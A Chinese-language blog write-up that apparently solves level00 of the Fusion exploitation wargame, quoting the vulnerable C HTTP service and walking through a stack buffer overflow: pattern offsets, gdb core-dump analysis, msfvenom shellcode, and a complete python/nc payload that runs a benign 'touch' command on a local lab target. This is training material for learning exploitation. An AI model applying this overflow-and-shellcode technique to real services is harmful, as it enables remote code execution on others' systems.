经过半个多月的时间把Protostar完成了,休息了几天,继续做Fusion。
*********题外话开始**********
在大学期间就在纠结是否选择程序猿的道路,结果因长时间高负荷写代码会引发不适而放弃了,不得不赞一下调好一个BUG时那种feel。如今,当完成一道题目也会有这种feel~~~~
*********题外话结束**********
level00源码:
#include "../common/common.c" int fix_path(char *path) { char resolved[128]; if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open strcpy(path, resolved); } char *parse_http_request() { char buffer[1024]; char *path; char *q; printf("[debug] buffer is at 0x%08x :-)\n", buffer); if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host"); if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request"); path = &buffer[4]; q = strchr(path, ' '); if(! q) errx(0, "No protocol version specified"); *q++ = 0; if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol"); fix_path(path); printf("trying to access %s\n", path); return path; } int main(int argc, char **argv, char **envp) { int fd; char *p; background_process(NAME, UID, GID); fd = serve_forever(PORT); set_io(fd); parse_http_request(); }
Fusion的题目是Protostar的进阶版,难度也更难了,当然,level00还是个热身题。通过题目提示知道是个Stack问题,而且shellcode应该放在resolved之外。
既然是Stack问题,那就来个长点的字符串吧。
fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_create.rb 150 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9 fusion@fusion:~$ python -c "print 'GET /'+'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9' + ' HTTP/1.1'" | nc localhost 20000 [debug] buffer is at 0xbf89b338 :-)
######################################################################
# 修改core文件生成路径的方法是: #
# sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern' #
######################################################################
通过gdb来查看core文件
fusion@fusion:/tmp$ sudo -s gdb --quiet --core=core.1368248639 [sudo] password for fusion: [New LWP 2495] Core was generated by `./level00'. Program terminated with signal 11, Segmentation fault. #0 0x65413665 in ?? () (gdb)
用pattern_offset.rb工具:
fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_offset.rb 0x65413665 139
由此可以得到溢出的字符修改EIP的位置在长度139的位置
接下来需要在输入中放进shellcode,通过core文件找到shellcode的位置。
fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\xef\xbe\xad\xde' + ' HTTP/1.1' + '\x90'*100 + 'a'*100 " | nc localhost 20000 [debug] buffer is at 0xbf89b338 :-)
***************
fusion@fusion:/tmp$ sudo -s gdb --core=core.1368255737 GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08 Copyright (C) 2011 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i686-linux-gnu". For bug reporting instructions, please see: <http://bugs.launchpad.net/gdb-linaro/>. [New LWP 2833] Core was generated by `./level00'. Program terminated with signal 11, Segmentation fault. #0 0xdeadbeef in ?? () (gdb) x/200x 0xbf89b340 0xbf89b340: 0x61616161 0x61616161 0x61616161 0x61616161 0xbf89b350: 0x61616161 0x61616161 0x61616161 0x61616161 0xbf89b360: 0x61616161 0x61616161 0x61616161 0x61616161 0xbf89b370: 0x61616161 0x61616161 0x61616161 0x61616161 0xbf89b380: 0x61616161 0x61616161 0x61616161 0x61616161 0xbf89b390: 0x61616161 0x61616161 0x61616161 0x61616161 0xbf89b3a0: 0x61616161 0x61616161 0x61616161 0x61616161 0xbf89b3b0: 0x61616161 0x61616161 0x61616161 0x61616161 0xbf89b3c0: 0x61616161 0x61616161 0xdeadbeef 0x54544800 0xbf89b3d0: 0x2e312f50 0x90909031 0x90909090 0x90909090 0xbf89b3e0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf89b3f0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf89b400: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf89b410: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf89b420: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf89b430: 0x90909090 0x90909090 0x61616190 0x61616161 0xbf89b440: 0x61616161 0x61616161 0x61616161 0x61616161 0xbf89b450: 0x61616161 0x61616161 0x61616161 0x61616161 0xbf89b460: 0x61616161 0x61616161 0x61616161 0x61616161 0xbf89b470: 0x61616161 0x61616161 0x61616161 0x61616161 0xbf89b480: 0x61616161 0x61616161 0x61616161 0x61616161 0xbf89b490: 0x0a616161 0x00000004 0xb77bc6e0 0x00000000
可以得到写的字符串从0xbf89b3d5开始记录。同样,在shellcode前面填充一些0x90。因此得到的payload格式应该是这样的:
GET /AAA……AA\x00\xb4\x89\xbf HTTP/1.10x90……0x90[SHELLCODE]
先获得一个shellcode:
fusion@fusion:/opt/metasploit-framework$ sudo -s ./msfvenom -p linux/x86/exec -f pl CMD="touch /tmp/fusion_for_zsz" [sudo] password for fusion: my $buf = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" . "\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00" . "\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75" . "\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57" . "\x53\x89\xe1\xcd\x80";
于是乎:
fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\x10\xb4\x89\xbf' + ' HTTP/1.1' + '\x90'*100 + '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57\x53\x89\xe1\xcd\x80' " | nc localhost 20000 [debug] buffer is at 0xbf89b338 :-) fusion@fusion:/tmp$ ll total 912 drwxrwxrwt 4 root root 340 2013-05-11 17:30 ./ drwxr-xr-x 1 root root 240 2013-05-11 22:50 ../ -rw------- 1 root 20000 196608 2013-05-11 15:03 core.1368248639 -rw------- 1 root 20000 196608 2013-05-11 15:33 core.1368250392 -rw------- 1 root 20000 196608 2013-05-11 15:36 core.1368250571 -rw------- 1 root 20000 196608 2013-05-11 15:41 core.1368250870 -rw------- 1 root 20000 196608 2013-05-11 15:46 core.1368251166 -rw------- 1 root 20000 196608 2013-05-11 15:51 core.1368251470 -rw------- 1 root 20000 196608 2013-05-11 16:02 core.1368252121 -rw------- 1 root 20000 196608 2013-05-11 17:02 core.1368255737 -rw------- 1 root 20000 196608 2013-05-11 17:16 core.1368256578 -rw------- 1 root 20000 196608 2013-05-11 17:16 core.1368256609 -rw------- 1 root 20000 196608 2013-05-11 17:19 core.1368256755 -rw------- 1 root 20000 196608 2013-05-11 17:24 core.1368257093 -rw-r--r-- 1 20000 20000 0 2013-05-11 17:30 fusion_for_zsz drwxrwxrwt 2 root root 40 2013-05-11 22:50 .ICE-unix/ drwxrwxrwt 2 root root 40 2013-05-11 22:50 .X11-unix/
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。